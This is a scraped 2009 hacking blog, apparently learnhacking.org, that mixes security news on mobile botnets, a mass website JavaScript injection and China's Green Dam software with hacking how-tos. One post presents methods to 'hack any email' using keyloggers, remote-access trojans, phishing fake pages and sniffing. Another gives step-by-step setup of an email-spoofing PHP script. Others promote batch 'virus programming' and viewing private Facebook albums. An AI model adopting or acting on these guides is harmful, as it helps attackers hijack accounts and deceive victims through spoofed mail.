Assuming the iPhone exploit described above was able to make it into the wild, it could effectively compromise all the unprotected iPhones in the world (which, in theory, would be all of them, if no patch is distributed). The hack would essentially turn the phones into "zombies" - a term usually used to refer to PCs compromised by a hack, virus, or trojan horse in order to do the bidding of a hacker. Along with other compromised PCs like them, this group of computers would form a botnet of "zombie" machines.

While botnets are common in the PC world - it's estimated that these machines are used to send anywhere from fifty to eighty percent of spam worldwide - botnets consisting of mobile phones are practically unheard of...or are they?

Earlier this month, Symantec revealed an SMS threat dubbed "Sexy Space" created using malware known as SymbOS.Exy.C, a revision of older variations also used to create similar threats. Using simple social engineering tactics, this hack involves sending SMS spam with names like "Sexy View," "Sexy Girl," and "Sexy Space" to encourage victims to click an included link in the text message.

[Image]

This particular exploit, only found on Symbian-powered devices so far, is smart enough to end certain programs on the hijacked phone that would make it possible to manually end the threat. At first, the hack was only being seen in China, but later an English version was discovered in the Middle East.

What's most frightening about this particular threat is that it's controlled by a central server. That means hackers could control the attacked phones the same way hackers today control zombie PCs. This led the Symantec researchers to wonder if this was, in fact, the first case of a mobile botnet being spotted in the wild.

But My Phone Has Never Been Attacked!

Security researchers have been warning us about the upcoming mobile risks for some time and yet few people have ever actually had their phone compromised by malware, it seems. To date, mobile exploits have been few and far between and have had no major impact on the industry as a whole or on consumer confidence levels regarding these devices. Perhaps lulled into a false sense of security since mobile phones were once much more basic devices without internet access and data plans, most people don't even realize that their phone could be at risk of an attack.

In a paper released this past fall from the Georgia Tech Information Security Center, Tom Cross, a researcher with the IBM Internet Security Systems X-Force team was quoted as saying how surprised he was that there haven't been more attacks to date on smartphone devices like Apple's iPhone. However, he noted that "financial motivation and increased adoption will increase attacks to smartphones in the years to come. As more payment infrastructure gets placed on these devices, they will become a more attractive target."

In other words, mobile phones just aren't worth hacking yet. That will change once more financial transactions take place over phones, agreed Dave Amster, VP of security investigations at Equifax, in that same report. "Consumers are ordering credit reports from their Blackberrys, which puts valuable information at risk," he said.

Still, hacking the mobile platform will remain a challenge. According to Patrick Traynor, a computer science professor at Georgia Tech and member of GTISC, the lifecycle for mobile phones is much shorter than that of PCs. Most people buy a new mobile device every two years - a cycle which allows manufacturers to keep up with security design - and potentially stay ahead of hackers.

But if there's one thing we've all learned over the years, it's that you should never count out the hackers. If there's something to be gained by creating mobile botnets - beyond simply proving that it's possible to do so - then there's no doubt that hackers will attempt to create them.

How to scan a file for virus with out downloding it your computer

By Anonymous November 15, 2009 No comments

This is very help full website for those who wana check the files for virus with out downloading it to your own computer

Now a days most of the hacking tools and also some of the files that our trusted friends sends may contain keyloggers or virus .

NoVirusThanks, a website that offers free service to analyze your file with 22 AntiVirus Engines and will report back the analysis result :

it introduced a new feature to scan the website contain any files with virus or any miscellaneous software or any drive -by-download attacks

it can scan php,.html.,js, sites
the main advantage is it saves your bandwidth and also time but the main drawback is this can scan only files maximum of 20 mb

plzz comment if u know any nice services like this

How to analyze shellcode

By Anonymous November 15, 2009 No comments

Often in some exploit analysis we need to analyze the shellcode,what it does and how.There are many ways you can do it.but the most simple way is to use following link:

http://sandsprite.com/shellcode_2_exe.php

Just copy paste your shellcode and it will give you a exe containing shellcode.then you can simply run it in ollydebugger and step in. sometimes shellcode is encrypted using the XOR but that is very simple to decode.

Hope it helps ..

Google's new operating system to take on Microsoft

By Anonymous November 15, 2009 No comments

Google is developing a new operating system for laptop computers in its boldest challenge yet to Microsoft's control over people's computing experience.

The new operating system will run through Google's nine-month-old Web browser, Chrome, according to a post late Tuesday night on the Mountain View-based company's Web site.

Google plans to introduce the operating system during the second half of 2010.

The new operating system is being designed for "netbooks," a low-cost, less powerful breed of laptops that is becoming increasingly popular among consumers primarily interested in a having a computer to surf the Web.

The Chrome browser could threaten Microsoft's Windows system, which has been running most personal computers for the past two decades.

Batch File Programming E-Book Released Online

By Anonymous November 15, 2009 No comments

I am very happy to inform that the E-book on ‘Batch File Programming‘ authored by me is published on the Internet today. More over i have found 39 Reads with in 15 Minutes from the time of uploading in the popular Document uploading site www.scribd.com.

This book ‘Batch File Programming’ is written after experimenting and testing all the snippets covered in this book. Batch File Programming is a pretty old one, but i have found lot of books that haven’t covered the dark-side of the batch, which still remains untold. The ultimate goal of this book is to make the readers understand how it works, what are the limitations of the batch, what else is possible with a batch, constructing useful programs with various views, Creating a batch virus by mis-using the commands, creating a batch file to an executable and lot more.

This book is aimed at novice to advanced programmer, No matter if you are new to programming, this would be the right drive to start with, since this book contains real time examples along with screenshots that really helps in a better understanding of the concept.

Batch File Programming

Due to more number of readers online for this book, scribd has awarded and added this book to its ‘HOT LIST‘, just within the 3 hours from the time of upload.

Even though I have enclosed the scribd link for reading this book online, i am enclsoing the Table of Contents here in this page for your kind review.

Introduction

Internal & External Commands

Run Line Commands

Batch Operators

Basic Commands

Environment Variables

Looping Statements

Conditional Statements

Commands Associated with files and folders

Network Troubleshooting commands

Code snippets

Virus Programming

Converting Batch to Executable’s

Each of the category displayed in the table of contents has its own sub-categories along with lot of batch programs bundled with it.

If you want to read the book online, you can check with this Link

http://www.scribd.com/doc/15565801/Batch-File-Programming

or by Clicking Here

By Anonymous July 11, 2009 No comments

Think about your financial information, and personal emails that your account holds. Don’t risk being hacked. read the post information and follow then u will never get hacked even if ur account got hacked u can get it back

now a days most off the email services like gmail and yahoo introduced the captcha system so old brute forcing method wont work .

check the email hacking methods so that you can defend from those attacks

the main steps to hack proof your email comes while registering the email accout

you must set up the secondary mail id and also the security question

Where did you meet your spouse?

What was the name of your first school?

Who was your childhood hero?

What is your favorite pastime?

What is your favorite sports team?

What is your father’s middle name?

What was your high school mascot?

What was your first car of bike?

What is your pet’s name?

For example, a pet’s name. Don’t write your real pet’s name. Invent one! so that no one can guess that add some special characters to your password like @#$*^ ” these cant be recorded by most of the keyloggers

make the note of the security question and the secondary id some where in your dairy.

keyloggers are mostly responsible for steeling of the date both account passwords

Here are the best tools to protect your information from being stolen.

Web Based On Screen Keyboards

Some website such as Citibank has an on-screen javascript keyboard which you can use your mouse to click the character. This way, you can avoid using your keyboard. There is no need to install anything because everything is loaded from the website. If you’d like to implement an on-screen keyboard on your website, please visit the links below.

1. JavaScript Virtual Keyboard by Dmitry Khudorozhkov.

2. Javascript VirtualKeyboard by WingedFox.

- In my opinion, WingedFox’s Javascript VirtualKeyboard is much better than Dmitry’s JVK.

Program On Screen Keyboards

If you want to use an on-screen keyboard on a website but the on-screen keyboard is not available, you can download and use program type of on-screen keyboard. Usually the on screen keyboard program is very small in size and free to use.

1. Neo’s SafeKeys

2. MiloSoft Virtual On Screen Keyboard

3. Click-N-Type virtual keyboard

4. Mouse Only Keyboard v1.4 (MOK)

Softwares:

1. QFX KeyScrambler

2. I Hate Keyloggers

3. SnoopFree Privacy Shield 1.0.5

4. MyPlanetSoft Anti-Keylogger v1.5

5. KL-Detector v1.3

6. PSMAntiKeyLogger

By Anonymous July 11, 2009 No comments

This is the first post on hacking and this is also the ultimate post that will teach you how to hack any email. After reading this post u can hack gmail, yahoomail, hotmail, aol mail

The following article is not only teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.

You all are very lucky for reading this post in learnhacking.org, because i worked very hard about more than 3 months to learn this.

Getting started :

There are so many ways to hack emails depending on the victim
Hacking with Keyloggers
Hacking with Trojans
Usage of Fake pages

Keyloggers :

Installing the keylogger in the victim’s system records each and every keystroke (every keyborad button including symbols), its very easy if u have the physical acsess to his/her system and its a bit complicated when it comes in remote installation.

A keylogger records the every keystrokes (as said above) the victim presses and mail you the info. By installing the keylogger u can not only hack his email password u can get the list of the sites he visits and their passwords you can also hack bank and paypal accounts with this.

Keyloggers are widely available on the internet, you can google it (google search) for more info or you can just check our upcoming posts on hacking emails using keyloggers.

Soon we will upload some videos too.

Trojans
These are the hackers best friends, also called as Remote Administration Tools, you can play with the victim’s system with the help of these tools, you will have total control over his system, some of the features of these programs are as follows

- Pro – connective ( Reverse Connection)

- Run any Program in the victim’s pc.

- Run MS-Dos Command.

- Run Batch Script

- Run Vb Script

- Run Registry Entry

- Receive MSN , Steam , IExplorer, Firefox, Anti virus , Dial-Up , Crypted Passwords

- Keylogger ( Live keylogger, you can see in Live ! ) *New*

- ScreenShot + WebCam ( Live ! ) *New*

- Files Manager with PRO Options

- Search Files

- Registry

- Admin FTP

- Windows

- Application ( Max Process , Directory Of File, Memory RAM, Refresh and Kill Button )

- Online Editor *New*

- Printer

- Downloader

- Give Damage

- Clip board

- Shut Down PC

- Control Panel

- MSN Stuff ( You can add a contact , delete a contact, change his status and chat with his contacts in Live ! ) *New*

- Funny Stuff ( Hide Desktop Windows, Hide Start Button , Hide task bar, Open CD-ROM, Swap Mouse Buttons, Minimize All Windows, Start Mouse Control, Modify/Upload Wallpapers, Play Sound, Control keyboard, Lock Ctrl+Alt+Del, HTML Script) *New*

- Chat ( With Custom Skin , Nickname) *New*

- Alert Message ( Custom Error messages, Questions with answers)

and also a lot of things can be done with these trojans.

If you want to know how to hack with trojans and where to get them, just check our upcoming posts on email hacking with trojans.

Fake pages

Hacking by fake pages is the best easy and effective way its mostly used and 33% of the total passwords hacked are by using this method .

In this method we will send him a fake page of the site which we want to hack, fake page looks exactly the same like the real one the only difference is the address or url of the page , the victim thinks that fake page as original one and enters the password then we will get his password to our mail

1.HACK GMAIL

2.HACK YAHOOMAIL

3.HACK HOTMAIL

4.HACK AOL

4.SNIFFING

This method is used when the victim and you are in the same lan then we can sniff all his passwords and also record all his traffic.

For more info check our upcoming post on hacking email by sniffing.

How to get back a hacked orkut or gmail account

By Anonymous July 11, 2009 No comments

Now a days most of the hackers are targeting gmail accounts dude to the no of services offered by the google

if hacker change the secret question and secondary email to new ones. Once these two things are changed, you cannot get back your account through the forgot password tool.

then follow these steps

Gmail has a special page to report such incidents when someone hacks into your account.

check it here :https://services.google.com/inquiry/gmail_security1.

The Gmail Team considers numerous data points when determining original account ownership in a hijacking case. In addition to the information requested on the form, you can also include the following information to help them process your claim.
The email addresses of up to 3 Frequently Mailed Contacts
The names of up to 3 Labels
Any other Google services you used with this account and the date you started using each one
Your ip-address

You can also resubmit the form later if you find any additional information that would help them investigate. This process is said to take about 4-10 days.

BackTrack 4 Pre Release Available For Download

By Anonymous July 11, 2009 No comments

You may remember back in February the BETA of BackTrack 4 was released for download, the team have made many changes and have now released BackTrack 4 Pre Release.

For those that don’t know BackTrack is the top rated linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-Rom and is fully accessible within minutes.

It’s evolved from the merge of the two wide spread distributions – Whax and Auditor Security Collection. By joining forces and replacing these distributions, BackTrack has gained massive popularity and was voted in 2006 as the #1 Security Live Distribution by insecure.org. Security professionals as well as new-comers are using BackTrack as their favorite toolset all over the globe.

The new version has busted the 700mb file size though so it’d DVD or USB, it’s recommended to use a USB drive to run it or install it on your HDD as running from a CD isn’t exactly speedy.

Full details available in the PDF guide:

BackTrack 4 Guide [PDF]

You can download BackTrack 4 Pre Release ISO here:

bt4-pre-final.iso

Or read more here.

Massive Malware Outbreak Infects 30,000 Websites

By Anonymous July 01, 2009 No comments

This looks like a fairly complex infection mechanism combining exploiting websites, injecting JavaScript code then attempted exploitation of host machines and failing that prompting a download for some fake malware.

The way they have it all setup is pretty clever too hiding behind common technologies so their infections don’t look out of place.

An obfuscated JavaScript meant to look like Google Analytics code? That’s smart.

A nasty infection that attempts to install a potent malware cocktail on the machines of end users has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday.

The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot.

The malicious payload silently redirects visitors of infected sites to servers that analyze the end-user PC. Based on the results, it attempts to exploit one or more of about 10 different unpatched vulnerabilities on the visitor’s machine. If none exist, the webserver delivers a popup window that claims the PC is infected in an attempt to trick the person into installing rogue anti-virus software.

If you imagine 30,000 websites have been installed, how much traffic do these sites have in total? And out of that how many client computers have been infected.

The numbers could be quite huge.

The rogue anti-virus seems fairly intelligently designed too with polymorphic techniques to avoid signature scanning by real AV engines.

The rogue anti-virus software uses polymorphic techniques to constantly alter its digital signature, allowing it to evade detection by the vast majority of legitimate anti-virus programs. Because it uses obfuscation, the javascript is also hard to detect by antivirus programs and impossible to spot using Google searches that scour the web for a common string or variable.

“For the common user, it’s going to be possible but difficult to determine what the code is doing or if it’s indeed malicious,” Chenette told The Register. “We can see this quickly growing.”

The infection shares many similarities with a mass website malady that’s been dubbed Gumblar. It too injects obfuscated javascript into legitimate websites in an attempt to attack visitors. So far, it’s spread to about 60,000 sites, Websense estimates.

Several differences in the way the javascript behaves, however, have led Websense researchers to believe the two attacks are unrelated. The researchers have also noticed that the code, once it’s deobfuscated, points to web addresses that are misspellings of legitimate Google Analytics domains that many sites use to track visitor statistics. The RBN, or Russian Business Network, has used similar tactics in the past, and Websense is now working to determine whether those responsible for this latest attack have ties to that criminal outfit.

Seems like it could possibly be from Russia (the RBN) and it’s not related to Gumblar, even though they have quite a few similarities.

Interesting case to watch, and make sure any sites you run are up to date, secured and not open to SQL injection!

Source: The Register

China's Mandated Site-Blocking Software is Pirated code

By Anonymous July 01, 2009 No comments

ccording to Solid Oak Software, the makers of CyberSitter, one of the more popular Internet-filtering programs, not only does Green Dam look similar to CyberSitter, it uses DLLs identified with CyberSitter, and even gets updates from Solid Oak's servers.

Piracy? A Chinese company stealing intellectual property No way !!!!!!!!!

CYBERsitter - Solid Oak Software

[Image]

Green Dam - Software

Seriously, not only does the software use pirated code, a University of Michigan study shows that the software contains security vulnerabilities.

The good thing is, the software needn't be installed on PCs bought in China; the OEM merely has to provide a CD with the installable image. Additionally, the software is uninstallable, although the University of Michigan study notes that it leaves the log files behind, so even after uninstalling, historical user activity can be ascertained.

An interesting conundrum, however. Since the Green Dam program contains CyberSitter code, any OEM providing the code on or with their computers would be facilitating piracy. Of course, if they don't do so, they won't be able to sell to China. Ooof.

via

How to Send Anonymous Emails

By Anonymous July 01, 2009 No comments

The art of sending this kind emails is known as Email Spoofing.This method used to work successfully in the past, but today it has a very low success rate since Gmail and Yahoo(all major email service providers) blocks the emails that are sent directly from a PC. In this post I have come up with a new way to send anonymous emails (spoofed emails) that has 100% success rate. If you have to successfully send an anonymous email or spoofed email, you should send it using a relay server.

What is a Relay Server?

In simple words, a relay server is an SMTP Server that is trusted by Google or Yahoo as an authorised sender of the email. So, when you send an email using a relay server, the email service providers like Yahoo and Gmail blindly accept the emails and deliver it to the inbox of the recipient. If the SMTP server is not authorised, Google and Yahoo will reject all the emails sent from this SMTP server. This is the reason for which using our own SMTP server to send emails fail.

So What’s Next?

Now all we have to do is, find a trusted SMTP server to Send Spoofed Emails. Usually all the emails that are sent from web hosting providers are trusted and authorised. So, you have to find a free web hosting provider that allows you to send emails. But, most of the free Web Hosts disable the Mail feature and do not allow the users to send emails. This is done just to avoid spamming. However all the paid hosting plans allow you to send any number of emails. Once you find a hosting service that allows to send emails from their servers, it’s just a cakewalk to send anonymous emails. All we have to do is just modify the email headers to insert the spoofed From address field into it.

I have created a PHP script that allows you to send emails from any name and email address of your choice. The script can be found here.

Anonymous Email Sender Script

Here is a step-by-step procedure to setup your own Anonymous Email Sender Script

1. Goto X10 Hosting and register a new account.

2. Download my Anonymous Email Sender Script (sendmail.rar).

3. Login to your FreeWebHostingArea Account and click on File Manager.

4. Upload the sendmail.php, pngimg.php and bg1.PNG files to the server.

5. Set permissions for sendmail.php, pngimg.php and bg1.PNG to 777.

6. Now type the following URL

http://yoursite.x10hosting.com/sendmail.php

NOTE: yoursite must be substituted by the name of the subdomain that you have chosen during the registration process.

7. Use the script to send Anonymous Emails. Enjoy!!!

Tell me whether it worked or not. Please pass your comments…

WARNING: ALL THE INFORMATION PROVIDED IN THIS POST ARE FOR EDUCATIONAL PURPOSE ONLY. I AM NOT RESPONSIBLE FOR ANY MISUSE.

1.How to View the Album of Any User Even if it is Private

2. How to Remove Annoying Facebook Advertisement

3. How to see Real Profiles from Public Pages

4. How to Undo Facebook Changes

5. How to View All the Photos from a Person

6. How to Find More Friends at Facebook

7. How to Share Files from Facebook

8. How to Get a Job from Facebook

9. How to Tighten up the Privacy and still Maintain Communication Convenience

10 How to Cheat Facebook Texas Hold em Poker

The iPhone SMS Hack

The First Mobile Botnet?

But My Phone Has Never Been Attacked!

Social Profiles

Blog Archive

BTemplates.com

Blogroll

About